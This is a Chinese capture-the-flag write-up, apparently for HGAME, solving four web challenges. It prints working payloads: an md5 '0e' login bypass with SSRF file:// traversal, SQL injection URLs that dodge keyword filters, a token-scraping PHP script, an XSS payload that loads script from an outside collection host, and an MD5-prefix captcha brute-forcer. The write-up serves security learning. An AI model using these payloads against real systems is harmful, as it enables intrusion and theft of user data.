Cosmos的博客后台
使用伪协议读取代码后发现可以直接通过所谓的debug模式进行用户名和密码的读取密码可以随便找一个md5加密后0e开头的字符串进行弱类型比较,进入后台后发现是一个ssrf的模板,直接使用file协议跨目录对根目录下的flag进行读取
file://localhost/../../../../flag,解一下图片的base64
Cosmos的留言板-1
过滤了空格,使用/**/代替,双写select后即可进行注入http://139.199.182.61/index.php?id=-1%27/**/union/**/seselectlect/**/(seselectlect/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())%23http://139.199.182.61/index.php?id=-1%27/**/union/**/seselectlect/**/(seselectlect/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=%27f1aggggggggggggg%27)%23http://139.199.182.61/index.php?id=-1%27/**/union/**/seselectlect/**/(seselectlect/**/fl4444444g/**/from/**/f1aggggggggggggg)%23
Cosmos的新语言
直接贴脚本了
<?php
function decrypt($str){
$result = '';
for($i = 0;$i < strlen($str);$i++)
{
$result .= chr(ord($str[$i]) - 1);
}
return $result;
}
function getNeedBetween($kw1,$mark1,$mark2){
$kw=$kw1;
$kw='123'.$kw.'123';
$st =stripos($kw,$mark1);
$ed =stripos($kw,$mark2);
if(($st==false||$ed==false)||$st>=$ed)
return 0;
$kw=substr($kw,($st+1),($ed-$st-1));
return $kw;
}
function send_post($url, $post_data) {
$postdata = http_build_query($post_data);
$options = array(
'http' => array(
'method' => 'POST',
'header' => 'Content-type:application/x-www-form-urlencoded',
'content' => $postdata
)
);
$context = stream_context_create($options);
$result = file_get_contents($url, false, $context);
return $result;
}
$url = "http://59bca5b1ca.php.hgame.n3ko.co/";
$url2 = "http://59bca5b1ca.php.hgame.n3ko.co/mycode";
$html = file_get_contents($url);
$html2 = file_get_contents($url2);
//echo $html;
//echo $html2;
$encode = "PVVXTjVVak80Z0RON01tT3pnVE40TWpOa3BqWjNVR09vbHpPMFFtTzBjalo=";
$result = explode('(', $html2);
$arr = array();
for ($i=6; $i <=15 ; $i++) {
array_push($arr,$result[$i]);
}
var_dump($arr);
$encode = substr(strip_tags($html),95);
//var_dump($encode);
for ($i=0; $i<10 ; $i++) {
if($arr[$i] == 'str_rot13')
{
$encode = str_rot13($encode);
}
if($arr[$i] == 'encrypt')
{
$encode = decrypt($encode);
}
if($arr[$i] == 'base64_encode')
{
$encode = base64_decode($encode);
}
if($arr[$i] == 'strrev')
{
$encode = strrev($encode);
}
}
echo $encode;
$post_data = array('token'=>$encode);
echo send_post('http://59bca5b1ca.php.hgame.n3ko.co/index.php',$post_data);
?>
Cosmos的聊天室
过滤了成对的尖括号,将输入的内容大写并且直接将script替换为无意义的字符,参考手册
https://www.secpulse.com/archives/61940.html
首先利用括号半开解决成对尖括号被过滤的问题,然后十进制的方式同时解决了script和内容大写的问题,最后找个xss平台接收一发
<img src=x one rror="eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtib2R5LmFwcGVuZENoaWxkKHMpO3Muc3JjPSdodHRwOi8veHNzcHQuY29tL3U1YmhmMz8nK01hdGgucmFuZG9tKCk='))"
至于验证码用现成的脚本就好
import hashlib
from multiprocessing.dummy import Pool as ThreadPool
# MD5截断数值已知 求原始数据
# 例子 substr(md5(captcha), 0, 6)=60b7ef
def md5(s): # 计算MD5字符串
return hashlib.md5(str(s).encode('utf-8')).hexdigest()
keymd5 = '3849c2' #已知的md5截断值
md5start = 0 # 设置题目已知的截断位置
md5length = 6
def findmd5(sss): # 输入范围 里面会进行md5测试
key = sss.split(':')
start = int(key[0]) # 开始位置
end = int(key[1]) # 结束位置
result = 0
for i in range(start, end):
# print(md5(i)[md5start:md5length])
if md5(i)[0:6] == keymd5: # 拿到加密字符串
result = i
print(result) # 打印
break
list=[] # 参数列表
for i in range(10): # 多线程的数字列表 开始与结尾
list.append(str(10000000*i) + ':' + str(10000000*(i+1)))
pool = ThreadPool() # 多线程任务
pool.map(findmd5, list) # 函数 与参数列表
pool.close()
pool.join()
替换一下token即可完成flag的获取